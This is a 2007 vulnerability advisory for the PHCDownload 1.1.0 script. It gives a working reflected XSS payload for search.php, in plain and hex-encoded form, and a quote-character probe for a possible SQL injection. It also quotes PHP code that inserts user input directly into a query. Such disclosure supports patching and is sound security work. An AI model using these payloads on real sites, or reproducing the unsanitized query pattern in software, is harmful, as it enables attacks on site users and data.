###############################################
XSS Flaw & posible SQL injection in PHCDownload
vendor url: http://www.phpcredo.com/
Advisore: http://lostmon.blogspot.com/2007/12/
xss-flaw-posible-sql-injection-in.html
vendor notify:YES exploit available: YES
###############################################

New XSS Flaw & posible SQL injection in search.php


PHCDownload contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'string' variable upon submission to 'search.php'
script.


This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.


verions:


1.1.0 afected.


example :


we can try inject some normal html or javascript code:


Code:


"><h1><a href="http://lostmon.blogspot.com">Lostmon</a> Was Here
!!!</h1><br><h1>XSS Pow@ !!!</h1><p><iframe
src="http://lostmon.blogspot.com"></iframe></p>


or inject directly the code in hex values :


Code:


%22%3E%3C%68%31%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73­%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F­%6E%3C%2F%61%3E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%62­%72%3E%3C%68%31%3E%58%53%53%20%50%6F%77%40%20%21%21%21%3C%2F%68%31%3E%3C%70­%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74­%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D­%65%3E%3C%2F%70%3E
example in hex:


http://localhost/phcdownload/search.php?string=[XSS-CODE]


also this variable is prone vulnerable too to SQL injections.


if we look the source code of search.php arround line 36 we have :


Code:
// Prepare search query
if( $kernel->config['archive_search_mode'] == 1 )
{
$search_syntax = "MATCH( f.file_name, f.file_description,
f.file_version, f.file_author ) AGAINST (
'*{$kernel->vars['string']}*' IN BOOLEAN MODE )";


}


else
{
$search_syntax = "MATCH( f.file_name, f.file_description,
f.file_version, f.file_author ) AGAINST (
'*{$kernel->vars['string']}*' )";

}


the value of 'string' is inserted directly in the sql query and this
could be dangerous...

we can try to disclose the query :


http://localhost/phcdownload/upload/search.php?string='


i make several probes , but i don´t have found a working exploit or a
exploitable angle to this issue , but ...need to be patch


Thnx to estrella to be my ligth
Thnx to all Lostmon´s Group Team

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....